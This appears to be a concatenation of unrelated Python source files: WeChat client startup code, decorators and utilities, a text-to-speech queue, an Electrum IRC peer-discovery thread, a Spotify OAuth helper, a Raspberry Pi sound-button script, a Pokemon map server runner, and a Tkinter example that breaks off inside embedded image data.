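    # Anything that matches neither pattern falls through to '未知' (unknown).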
class UnicodeStreamFilter:
def __init__(self, target):
self.target = target
self.encoding = 'utf-8'
self.errors = 'replace'
self.encode_to = self.target.encoding
def write(self, s):
if type(s) == str:
s = s.encode().decode('utf-8')
s = s.encode(self.encode_to, self.errors).decode(self.encode_to)
self.target.write(s)
def flush(self):
self.target.flush()
if sys.stdout.encoding == 'cp936':
sys.stdout = UnicodeStreamFilter(sys.stdout)
if __name__ == '__main__':
logger = logging.getLogger(__name__)
if not sys.platform.startswith('win'):
import coloredlogs
coloredlogs.install(level='DEBUG')
webwx = WebWeixin()
webwx.start()
|
misc.py
|
import os
import sys
import linecache
import functools
import io
from threading import Thread
from . import logger
class TimeoutError(Exception):
pass
def timeout(seconds, error_message='Time out'):
def decorated(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
share = [TimeoutError(error_message)]
def func_with_except():
try:
share[0] = func(*args, **kwargs)
except Exception as e:
share[0] = e
t = Thread(target=func_with_except)
t.daemon = True
try:
t.start()
t.join(seconds)
except Exception as e:
logger.error('Starting timeout thread for %s error', e)
raise e
result = share[0]
if isinstance(result, BaseException):
raise result
return result
return wrapper
return decorated
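# Hedged usage sketch for the timeout decorator above (the function name and
# the 0.1s/1s figures are illustrative, not part of the original module):
def _timeout_example():  # pragma: no cover
    import time as _time

    @timeout(0.1, error_message='took too long')
    def _slow():
        _time.sleep(1)
        return 'done'

    try:
        return _slow()
    except TimeoutError as exc:
        # The daemon worker thread keeps running in the background, but the
        # caller gets the module's TimeoutError after roughly 0.1 seconds.
        return str(exc)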
def trace(f): # pragma: no cover
def globaltrace(frame, why, arg):
if why == 'call':
return localtrace
return None
def localtrace(frame, why, arg):
if why == 'line':
# record the file name and line number of every trace
filename = frame.f_code.co_filename
lineno = frame.f_lineno
bname = os.path.basename(filename)
print('{}({}): {}\n'.format(
bname,
lineno,
linecache.getline(filename, lineno).strip('\r\n')))
return localtrace
def _f(*args, **kwds):
try:
sys.settrace(globaltrace)
result = f(*args, **kwds)
return result
finally:
sys.settrace(None)
return _f
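# Hedged usage sketch for trace (illustrative only): wrapping a function prints
# every line it executes as "<basename>(<lineno>): <source>" while it runs.
def _trace_example():  # pragma: no cover
    @trace
    def _add(a, b):
        total = a + b
        return total
    # Calling _add(1, 2) prints the two body lines above, prefixed with this
    # file's basename and their line numbers, and then returns 3.
    return _add(1, 2)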
# https://github.com/giampaolo/psutil/blob/master/psutil/_common.py
def memoize(fun):
"""
A simple memoize decorator for functions supporting (hashable)
positional arguments.
It also provides a cache_clear() function for clearing the cache:
>>> @memoize
    ... def foo():
    ...     return 1
...
>>> foo()
1
>>> foo.cache_clear()
>>>
"""
@functools.wraps(fun)
def wrapper(*args, **kwargs):
key = (args, frozenset(sorted(kwargs.items())))
try:
return cache[key]
except KeyError:
ret = cache[key] = fun(*args, **kwargs)
return ret
def cache_clear():
"""Clear cache."""
cache.clear()
cache = {}
wrapper.cache_clear = cache_clear
return wrapper
# https://github.com/giampaolo/psutil/blob/master/psutil/_common.py
def memoize_when_activated(fun):
"""
A memoize decorator which is disabled by default. It can be
activated and deactivated on request.
For efficiency reasons it can be used only against class methods
accepting no arguments.
>>> class Foo:
    ...     @memoize_when_activated
    ...     def foo(self):
    ...         print(1)
...
>>> f = Foo()
>>> # deactivated (default)
    >>> f.foo()
    1
    >>> f.foo()
    1
    >>>
    >>> # activated
    >>> f.foo.cache_activate()
    >>> f.foo()
    1
    >>> f.foo()
    >>> f.foo()
>>>
"""
@functools.wraps(fun)
def wrapper(self):
if not wrapper.cache_activated:
return fun(self)
else:
try:
ret = cache[fun]
except KeyError:
ret = cache[fun] = fun(self)
return ret
def cache_activate():
"""Activate cache."""
wrapper.cache_activated = True
def cache_deactivate():
"""Deactivate and clear cache."""
wrapper.cache_activated = False
cache.clear()
cache = {}
wrapper.cache_activated = False
wrapper.cache_activate = cache_activate
wrapper.cache_deactivate = cache_deactivate
return wrapper
# https://github.com/requests/requests/blob/master/requests/utils.py
def super_len(obj):
total_length = None
current_position = 0
if hasattr(obj, '__len__'):
total_length = len(obj)
elif hasattr(obj, 'len'):
total_length = obj.len
elif hasattr(obj, 'fileno'):
try:
fileno = obj.fileno()
except io.UnsupportedOperation:
pass
else:
total_length = os.fstat(fileno).st_size
if hasattr(obj, 'tell'):
try:
current_position = obj.tell()
except (OSError, IOError):
# This can happen in some weird situations, such as when the file
# is actually a special file descriptor like stdin. In this
# instance, we don't know what the length is, so set it to zero and
# let requests chunk it instead.
if total_length is not None:
current_position = total_length
else:
if hasattr(obj, 'seek') and total_length is None:
# StringIO and BytesIO have seek but no useable fileno
try:
# seek to end of file
obj.seek(0, 2)
total_length = obj.tell()
# seek back to current position to support
# partially read file-like objects
obj.seek(current_position or 0)
except (OSError, IOError):
total_length = 0
if total_length is None:
total_length = 0
return max(0, total_length - current_position)
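# Hedged usage sketch for super_len (not part of the original module); the
# values in the comments follow from the seek/tell fallback above:
def _super_len_example():  # pragma: no cover
    buf = io.BytesIO(b'abcdef')
    full = super_len(buf)        # 6: total length, nothing read yet
    buf.read(2)
    remaining = super_len(buf)   # 4: total length minus the current position
    return full, remaining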
|
tts.py
|
from __future__ import annotations
from typing import Callable, List, Tuple
from queue import Queue
import threading
import time
import accessible_output2.outputs.auto
from .log import warning, exception
class _TTS:
_end_time = None
def __init__(self, wait_delay_per_character):
self.o = accessible_output2.outputs.auto.Auto()
self._wait_delay_per_character = wait_delay_per_character
def IsSpeaking(self):
if self._end_time is None:
return False
else:
return self._end_time > time.time()
def Speak(self, text):
self.o.output(text, interrupt=True)
self._end_time = time.time() + len(text) * self._wait_delay_per_character
def Stop(self):
self.o.output("", interrupt=True)
self._end_time = None
_tts = None
_is_speaking = False
_queue: Queue[Tuple[Callable, List]] = Queue()
def is_speaking():
return _is_speaking
def _speak(text):
with _lock:
try:
_tts.Speak(text)
except:
exception("error during _tts.Speak('%s')", text)
def speak(text: str):
global _is_speaking
assert isinstance(text, str)
_queue.put((_speak, [text]))
_is_speaking = True
def _stop():
with _lock:
if _is_speaking:
try:
_tts.Stop()
except:
pass # speak() will have a similar error and fall back to sounds
def stop():
global _is_speaking
_queue.put((_stop, []))
_is_speaking = False
def _loop():
    while True:
cmd, args = _queue.get()
if not _queue.empty():
#print("skipped!", cmd, args)
continue
try:
cmd(*args)
except:
exception("")
def _loop2():
global _is_speaking
    while True:
if _is_speaking:
time.sleep(.1)
with _lock:
if not _tts.IsSpeaking():
_is_speaking = False
time.sleep(.1)
def init(wait_delay_per_character):
global _tts, _lock
_lock = threading.Lock()
_tts = _TTS(wait_delay_per_character)
t = threading.Thread(target=_loop)
t.daemon = True
t.start()
t = threading.Thread(target=_loop2)
t.daemon = True
t.start()
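# Hedged usage sketch (the 0.05s-per-character figure is an arbitrary example,
# not a recommended value). init() must run before speak()/stop(), since it
# creates the lock, the TTS backend and the two worker threads.
def _tts_example():  # pragma: no cover
    init(wait_delay_per_character=0.05)
    speak("hello world")      # queued; _loop() forwards it to the backend
    while is_speaking():      # crude wait based on the estimated end time
        time.sleep(0.1)
    stop()                    # queue a stop request and clear the flag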
|
ircthread.py
|
#!/usr/bin/env python
# Copyright(C) 2021 CryptoLover705
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import time
import socket
import ssl
import threading
import queue
import irc.client
from utils import logger
from utils import Hash
from version import VERSION
out_msg = []
class IrcThread(threading.Thread):
def __init__(self, processor, config):
threading.Thread.__init__(self)
self.processor = processor
self.daemon = True
options = dict(config.items('server'))
self.stratum_tcp_port = options.get('stratum_tcp_port')
self.stratum_tcp_ssl_port = options.get('stratum_tcp_ssl_port')
self.report_stratum_tcp_port = options.get('report_stratum_tcp_port')
self.report_stratum_tcp_ssl_port = options.get('report_stratum_tcp_ssl_port')
self.irc_bind_ip = options.get('irc_bind_ip')
self.host = options.get('host')
self.report_host = options.get('report_host')
self.nick = options.get('irc_nick')
if self.report_stratum_tcp_port:
self.stratum_tcp_port = self.report_stratum_tcp_port
if self.report_stratum_tcp_ssl_port:
self.stratum_tcp_ssl_port = self.report_stratum_tcp_ssl_port
if self.report_host:
self.host = self.report_host
if not self.nick:
            self.nick = Hash(self.host)[:5].hex()
self.pruning = True
self.pruning_limit = config.get('leveldb', 'pruning_limit')
self.nick = 'ELEC_' + self.nick
self.password = None
        self.who_queue = queue.Queue()
def getname(self):
s = 'v' + VERSION + ' '
if self.pruning:
s += 'p' + self.pruning_limit + ' '
def add_port(letter, number):
DEFAULT_PORTS = {'t':'50001', 's':'50002'}
if not number: return ''
if DEFAULT_PORTS[letter] == number:
return letter + ' '
else:
return letter + number + ' '
s += add_port('t',self.stratum_tcp_port)
s += add_port('s',self.stratum_tcp_ssl_port)
return s
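    # Hedged illustration of getname() output (version and ports are made up):
    # with VERSION '1.0', pruning_limit '100', stratum_tcp_port '50001' (the
    # default) and stratum_tcp_ssl_port '50012', it returns
    # 'v1.0 p100 t s50012 ' -- default ports collapse to a bare letter.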
def start(self, queue):
self.queue = queue
threading.Thread.start(self)
def on_connect(self, connection, event):
connection.join("#electrum-xvg")
def on_join(self, connection, event):
m = re.match("(ELEC_.*)!", event.source)
if m:
self.who_queue.put((connection, m.group(1)))
def on_quit(self, connection, event):
m = re.match("(ELEC_.*)!", event.source)
if m:
self.queue.put(('quit', [m.group(1)]))
def on_kick(self, connection, event):
m = re.match("(ELEC_.*)", event.arguments[0])
if m:
self.queue.put(('quit', [m.group(1)]))
def on_disconnect(self, connection, event):
logger.error("irc: disconnected")
raise BaseException("disconnected")
def on_who(self, connection, event):
line = str(event.arguments[6]).split()
try:
ip = socket.gethostbyname(line[1])
except:
# no IPv4 address could be resolved. Could be .onion or IPv6.
ip = line[1]
nick = event.arguments[4]
host = line[1]
ports = line[2:]
self.queue.put(('join', [nick, ip, host, ports]))
def on_name(self, connection, event):
for s in event.arguments[2].split():
if s.startswith("ELEC_"):
self.who_queue.put((connection, s))
def who_thread(self):
while not self.processor.shared.stopped():
try:
connection, s = self.who_queue.get(timeout=1)
            except queue.Empty:
continue
#logger.info("who: "+ s)
connection.who(s)
time.sleep(1)
def run(self):
while self.processor.shared.paused():
time.sleep(1)
self.ircname = self.host + ' ' + self.getname()
# avoid UnicodeDecodeError using LenientDecodingLineBuffer
irc.client.ServerConnection.buffer_class = irc.buffer.LenientDecodingLineBuffer
logger.info("joining IRC")
t = threading.Thread(target=self.who_thread)
t.start()
while not self.processor.shared.stopped():
client = irc.client.Reactor()
try:
#bind_address = (self.irc_bind_ip, 0) if self.irc_bind_ip else None
#ssl_factory = irc.connection.Factory(wrapper=ssl.wrap_socket, bind_address=bind_address)
#c = client.server().connect('irc.freenode.net', 6697, self.nick, self.password, ircname=self.ircname, connect_factory=ssl_factory)
c = client.server().connect('irc.freenode.net', 6667, self.nick, self.password, ircname=self.ircname)
except irc.client.ServerConnectionError:
logger.error('irc', exc_info=True)
time.sleep(10)
continue
c.add_global_handler("welcome", self.on_connect)
c.add_global_handler("join", self.on_join)
c.add_global_handler("quit", self.on_quit)
c.add_global_handler("kick", self.on_kick)
c.add_global_handler("whoreply", self.on_who)
c.add_global_handler("namreply", self.on_name)
c.add_global_handler("disconnect", self.on_disconnect)
c.set_keepalive(60)
self.connection = c
try:
client.process_forever()
except BaseException as e:
logger.error('irc', exc_info=True)
time.sleep(10)
continue
logger.info("quitting IRC")
|
authenticate.py
|
# shows a user's playlists (need to be authenticated via oauth)
import threading
import spotipy.oauth2 as oauth2
import spotipy
import queue
import os
from os.path import isdir, expanduser
from urllib.parse import urlparse
from bottle import route, run, response, request
auth_token_queue = queue.Queue()
event_queue = queue.Queue()
@route('/')
def index():
auth_code = request.query.code
if auth_code:
auth_token_queue.put(auth_code)
return "It worked! You may close this tab now"
return "Oops! Something went wrong. Please file a bug report"
def wait_for_done(task):
server = threading.Thread(target=task)
server.daemon = True
server.start()
while True:
event = event_queue.get()
if event == "done":
break
def run_server(host, port):
threading.Thread(target= lambda: wait_for_done(lambda: run(quiet=True,
host=host,
port=port))).start()
def get_cache_path(username):
cache_directory = expanduser("~/.cache")
if isdir(cache_directory):
return expanduser("~/.cache/.spotipy_credentials_cache-%s" % username)
return ".spotipy_credentials_cache-%s" % username
def prompt_for_user_token(username,
scope=None,
client_id = None,
client_secret = None,
redirect_uri = None):
"""
prompts the user to login if necessary and returns
the user token suitable for use with the spotipy.Spotify
constructor
Parameters:
- username - the Spotify username
- scope - the desired scope of the request
- client_id - the client id of your app
- client_secret - the client secret of your app
- redirect_uri - the redirect URI of your app
"""
if not client_id:
client_id = os.getenv("SPOTIPY_CLIENT_ID")
if not client_secret:
client_secret = os.getenv("SPOTIPY_CLIENT_SECRET")
if not redirect_uri:
redirect_uri = os.getenv("SPOTIPY_REDIRECT_URI", "http://localhost:8080")
if not client_id:
print('''
You need to set your Spotify API credentials. You can do this by
setting environment variables like so:
export SPOTIPY_CLIENT_ID='your-spotify-client-id'
export SPOTIPY_CLIENT_SECRET='your-spotify-client-secret'
export SPOTIPY_REDIRECT_URI='your-app-redirect-url'
Get your credentials at
https://developer.spotify.com/my-applications
''')
raise spotipy.SpotifyException(550, -1, 'no credentials set')
sp_oauth = oauth2.SpotifyOAuth(client_id, client_secret, redirect_uri,
scope=scope, cache_path=get_cache_path(username))
# try to get a valid token for this user, from the cache,
# if not in the cache, the create a new (this will send
# the user to a web page where they can authorize this app)
token_info = sp_oauth.get_cached_token()
if not token_info:
redirect_uri_parsed = urlparse(redirect_uri)
run_server(redirect_uri_parsed.hostname,
redirect_uri_parsed.port)
auth_url = sp_oauth.get_authorize_url()
try:
import webbrowser
webbrowser.open(auth_url)
except:
print("Please navigate here: %s" % auth_url)
response = "%s?code=%s" % (redirect_uri, auth_token_queue.get())
event_queue.put("done")
code = sp_oauth.parse_response_code(response)
token_info = sp_oauth.get_access_token(code)
# Auth'ed API request
if token_info:
return token_info['access_token']
else:
return None
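# Hedged usage sketch (the username and scope are illustrative; credentials are
# read from the SPOTIPY_* environment variables described in the docstring):
if __name__ == '__main__':
    token = prompt_for_user_token('some_username',
                                  scope='playlist-read-private')
    if token:
        sp = spotipy.Spotify(auth=token)
        for playlist in sp.current_user_playlists()['items']:
            print(playlist['name'])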
|
playback.py
|
import os
import time
import random
import threading
import RPi.GPIO as GPIO
# Define sounds
SOUNDS = {11: {'audio': ['CS_01.wav', 'CS_02.wav', 'CS_06.wav', 'CS_07.wav', 'CS_08.wav', 'CS_09.wav'], 'last_action': 0},
12: {'audio': ['CHM_01.wav', 'CHM_02.wav', 'CHM_03.wav', 'CHM_04.wav', 'CHM_05.wav'], 'last_action': 0},
13: {'audio': ['CL_01.wav', 'CL_02.wav', 'CL_03.wav', 'CL_05.wav', 'CL_06.wav'], 'last_action': 0},
15: {'audio': ['EPF_01.wav', 'EPF_02.wav', 'EPF_03.wav', 'EPF_04.wav', 'EPF_05.wav'], 'last_action': 0},
16: {'audio': ['CCC_01.wav', 'EBT_01.wav', 'EGF_01.wav', 'GC_01.wav', 'YH_01.wav'], 'last_action': 0},
18: {'audio': [], 'last_action': 0},
22: {'audio': [], 'last_action': 0}
}
# Define random playback interval
LAST_RANDOM_PLAYBACK = time.time()
# Ignore warning for now
GPIO.setwarnings(False)
# Use physical pin numbering
GPIO.setmode(GPIO.BOARD)
# Pin Setup
GPIO.setup(11, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(12, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(13, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(15, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(16, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(18, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(22, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
# Play sound using simple aplay command
def playSound(path):
print('PLAYING:', path)
os.system('aplay ' + path)
# Choose random sound to play
def playRandomSound():
global LAST_RANDOM_PLAYBACK
# Time
now = time.time()
# Check if recent button action
for c in SOUNDS:
if now - SOUNDS[c]['last_action'] < 20:
return None
# Check for last random playback
    if now - LAST_RANDOM_PLAYBACK >= random.randint(10, 30):
LAST_RANDOM_PLAYBACK = now
button_callback(random.choice([11, 12, 13, 15, 16]), True)
# Button callback
def button_callback(channel, isRandom=False):
global SOUNDS
# Time
now = time.time()
# Wait for timeout
if now - SOUNDS[channel]['last_action'] > 1.5:
# Save time of last button press
if not isRandom:
SOUNDS[channel]['last_action'] = now
        # Randomly select a file to play (channels with no sounds configured are skipped)
        if not SOUNDS[channel]['audio']:
            return
        afile = random.choice(SOUNDS[channel]['audio'])
# Execute button actions
t = threading.Thread(target=playSound, args=('sounds/' + afile,))
t.start()
# Register button events
GPIO.add_event_detect(11, GPIO.FALLING, callback=button_callback)
GPIO.add_event_detect(12, GPIO.FALLING, callback=button_callback)
GPIO.add_event_detect(13, GPIO.FALLING, callback=button_callback)
GPIO.add_event_detect(15, GPIO.FALLING, callback=button_callback)
GPIO.add_event_detect(16, GPIO.FALLING, callback=button_callback)
GPIO.add_event_detect(18, GPIO.FALLING, callback=button_callback)
GPIO.add_event_detect(22, GPIO.FALLING, callback=button_callback)
# Run until someone presses ctrl+c
while True:
try:
time.sleep(0.1)
playRandomSound()
except KeyboardInterrupt:
print('TERMINATED')
break
except:
continue
# Clean up
print('CLEANING UP')
GPIO.cleanup()
|
runserver.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import logging
import sys
from threading import Thread
from pogom import config
from pogom.app import Pogom
from pogom.models import create_tables
from pogom.search import search_loop, set_cover, set_location, search_loop_async
from pogom.utils import get_args
log = logging.getLogger(__name__)
def start_locator_thread(args):
if args.pycurl:
search_thread = Thread(target=search_loop_async, args=(args,))
else:
search_thread = Thread(target=search_loop, args=(args,))
search_thread.daemon = True
search_thread.name = 'search_thread'
search_thread.start()
if __name__ == '__main__':
args = get_args()
logging.basicConfig(stream=sys.stdout, level=logging.INFO,
format='%(asctime)s [%(module)11s] [%(levelname)7s] %(message)s')
if not args.debug:
logging.getLogger("peewee").setLevel(logging.INFO)
logging.getLogger("requests").setLevel(logging.WARNING)
logging.getLogger("pogom.pgoapi.pgoapi").setLevel(logging.WARNING)
logging.getLogger("pogom.pgoapi.rpc_api").setLevel(logging.WARNING)
logging.getLogger("pogom.models").setLevel(logging.WARNING)
logging.getLogger("werkzeug").setLevel(logging.WARNING)
elif args.debug == "info":
logging.getLogger("pogom.pgoapi.pgoapi").setLevel(logging.INFO)
logging.getLogger("pogom.models").setLevel(logging.INFO)
logging.getLogger("werkzeug").setLevel(logging.INFO)
elif args.debug == "debug":
logging.getLogger("pogom.pgoapi.pgoapi").setLevel(logging.DEBUG)
logging.getLogger("pogom.pgoapi.pgoapi").setLevel(logging.DEBUG)
logging.getLogger("pogom.models").setLevel(logging.DEBUG)
logging.getLogger("werkzeug").setLevel(logging.INFO)
create_tables()
set_location(args.location, args.radius)
set_cover()
start_locator_thread(args)
app = Pogom(__name__)
config['ROOT_PATH'] = app.root_path
app.run(threaded=True, debug=args.debug, host=args.host, port=args.port)
|
examples.py
|
# ------------------------------------------------------------------------------
# Created by Tyler Stegmaier.
# Property of TrueLogic Company.
# Copyright (c) 2020.
# ------------------------------------------------------------------------------
#
# ------------------------------------------------------------------------------
import queue
import random
from time import sleep
from typing import List, Union
from TkinterExtensions import *
print('TkinterExtensions.version', version)
class MainMenu_Colors: NumPadEntry = None
def _GetPhotoByteData() -> dict:
"""
PhotoData.keys:
exit
:return:
:rtype: dict
"""
items = {
'exit': b'iVBORw0KGgoAAAANSUhEUgAAAEYAAABGCAYAAABxLuKEAAAAAXNSR0IArs4c6QAAAARnQU1BAACx\njwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAAYdEVYdFNvZnR3YXJlAHBhaW50Lm5ldCA0LjEu'
b'\n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
jH/UGHGH17lX7mx21Eyb55zQXwpXbTIt25X\nASdOMXEQXOFMVFq2bFkrxzQPJR4WqVsdVGHWFSzTWYkeSgDUbQ+5kyebJuUl7YrmmFzlLn46ugI4\nwQ2O/D+c4R49lOzkm5qaupeHJfPnW6+S7Sp22QwRr3YXcr7yFVNfWOiYty8NynZzlHB69bUM7jLg\nBDc4whXOcMcH+ML55N/hmoflCl2M2T0C58HslTIOuwWKRlXr1zvKUaLeYeEjAa2PqOursxOAE2sm\nOMIVznCPDtfNCR4PqxRGiSLM1qTNJEKEtO5AwR/+4KjGyllFIBBPCufM8dXZGcAJbnCEK5zhHp3g\nNS8J2AMNnTpljitNZuyxoUO8JwnqCtQ/zRGtsONlvNU7d5p9ffpYBOPswVD38+99z+rqKuAENzjC\nNaxlSigUilkSNC8ijx07ZjeI8zSm6WLM3uzc7Rbodp3F/gEDTF2cPZmGykqTfdNNzWWzU1JsqPaT\nuvx8s/9LX2qlG2BfR5ElsJPnpSGntIiE85EjR2IWkfzHbjukp6dXU6hYS3HFLduoNwGjsFPQG6l8\n911HLUq0qj42bVpMnWPTp8fdj6l8/32rM7pOR8FmOKeTcIMjXOGckZERs+2AEJ5GPvnkk1kUqly+\n3C7W6GqsKxiTzODtgb2OaOT95jeOUqwUp6X51gE8iyd5s2f71ukI4AInuMERrnCGOz5wvmiW5q1N\nroiGcnPt/gkTk5foEfPZv0gE2ePGmSYljX5SvX+/2dm3r289sFNZb/Czz1zp1oLO7PHjW5XHvvbA\nNgMZL5zgdprsW0Oc+WXUqFFp8kHM1iZdh43gh3bs2BHBg2cnTbIeZRYnbDOLo7ij2HnddabmxAlH\npbU0BgJm7y23+NZrib3Dh9uyflJz8qRtw69ePMABLkQjuMERrtu3b4+7GY7Y4xMlOdkUPv/GG3Yr\nkEUXJ3lkikxYeLsjKE1PdxRi5ciMGb51/EDZeFKakeFbJx7gABc4wQ2OjBCtqpXe+B+fIAwnDtz+\nVKlIEVZkKNYKmB05L/ZzfYuFV3s4+thjzvRYKZIx7NAnAurEk6Na5/jViQa2c0cYLnCCGxwrKirM\njTfe2OaBG12IY8rJq1evtlfe2U5k5589jE8F4j//toXdI0eaiOr6STAnx2y5+mrfem1hy1VX2bp+\nonFvdo8a5VuPNZEHz3a4wAlucFyzZ